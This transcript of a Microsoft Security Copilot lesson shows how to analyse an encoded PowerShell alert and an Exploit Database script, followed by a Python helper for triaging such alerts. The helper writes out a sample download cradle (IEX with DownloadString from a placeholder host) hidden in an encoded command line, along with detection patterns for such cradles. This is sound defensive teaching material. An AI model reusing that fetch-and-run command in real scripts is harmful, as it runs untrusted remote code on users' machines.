From the course: Microsoft Security Copilot
Analyze suspicious code with Microsoft Security Copilot - Microsoft Security Copilot Tutorial
- [Instructor] Security analysts need to deal with all kinds of suspicious code. Let's see how Microsoft Security Copilot can help with that. Suspicious code analysis includes some common tasks, such as explaining what the code does, investigating its security impact and related vulnerabilities, recommending actions to defend against the malicious code, writing a code analysis report, and sharing your findings with your team members. It's impossible for security analysts to know every programming language and system command. Also, examining a complex script with hundreds of lines takes a long time. This is why we need Microsoft Security Copilot to work together with us.

Now let's do a quick demo. Here's a sample incident in my Microsoft Defender XDR portal. Under Attack story, click "Suspicious PowerShell download or encoded command execution". I found a suspicious PowerShell script. Under the command line, I see a very long script, and part of it seems to be Base64-encoded. Fortunately, we can click Analyze to let Security Copilot analyze it. Copilot summarized the script with a step-by-step explanation. This embedded script analysis function is very convenient for me during my incident investigation. I can also click More options, then choose Open in Security Copilot. It'll take me to the Security Copilot standalone portal, and I can continue my work there.

Now let's start a new session to analyze another script. To find a sample script, I will go to the Exploit Database. Exploit Database is a collection of public exploits used by many penetration testers and security researchers. I want to search for the exploits for phpMyAdmin. Let's select this exploit. I will copy the whole script and go back to my Microsoft Security Copilot portal. This time, instead of entering my prompt, I will use a system capability, Analyze a script or command, paste the sample script, and click Run. Copilot provides a step-by-step breakdown of what the script does.

To further investigate that script, I can enter "show me the CVEs related to this script". Copilot found the CVE ID and provided the details of the vulnerability. I can then ask Copilot to recommend actions to defend against the script. Copilot suggested some actions, such as updating phpMyAdmin to the latest version. Finally, I can share my findings with my colleagues. Click Share at the top right, add a name or email, and click Send. Once my colleagues receive the invitation email, they can click the View in Copilot link to access my shared session.
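The first script in the demo is a PowerShell command line whose payload is Base64-encoded. The mechanical step an analyst performs before (or alongside) asking Copilot to explain it is to decode that payload and scan it for the usual indicators. The following Python helper is an added example, not code from the course or from Microsoft: it decodes a `-EncodedCommand` argument (PowerShell expects UTF-16LE text, then Base64) and reports hits for download cradles, `Invoke-Expression`, hidden-window and no-profile switches, and embedded URLs. The command line, the script text and the `example.invalid` URL are all constructed for the example and are not indicators from the incident.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample: an invented download cradle standing in for the kind of
# script the alert showed. The URL is a placeholder, not a real indicator.
SAMPLE_PLAINTEXT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
)


def encode_powershell(command: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects:
    UTF-16LE bytes, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed command line of the shape seen under a Defender alert.
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden "
    "-EncodedCommand " + encode_powershell(SAMPLE_PLAINTEXT)
)

# The -EncodedCommand switch plus the abbreviations PowerShell accepts for it
# (-e, -ec, -enc) that attackers commonly use; the Base64 blob follows it.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

# Indicators worth surfacing before reading the whole script.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
        re.IGNORECASE,
    ),
    "invoke_expression": re.compile(r"Invoke-Expression|\bIEX\b", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE),
    "bypass_policy": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.IGNORECASE),
    "url": re.compile(r"https?://[^\s'\"]+", re.IGNORECASE),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None when the command line
    has no such switch or the payload is not valid Base64 / UTF-16LE."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Decode the encoded part (if any) and collect indicator hits over both
    the visible command line and the decoded script."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = {name: pat.findall(text) for name, pat in INDICATORS.items()}
    return {"decoded": decoded, "indicators": {k: v for k, v in hits.items() if v}}


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print("decoded:", result["decoded"])
    for name, matches in result["indicators"].items():
        print(f"{name}: {matches}")
```

Run it as-is to see the constructed sample decoded and flagged; to use it on a real alert, pass the command line copied from the Defender XDR incident page to `triage()`. The decoded text is what you paste into Copilot's Analyze a script or command capability when the raw Base64 blob is all the portal shows you, and the indicator hits are a quick sanity check on Copilot's step-by-step explanation.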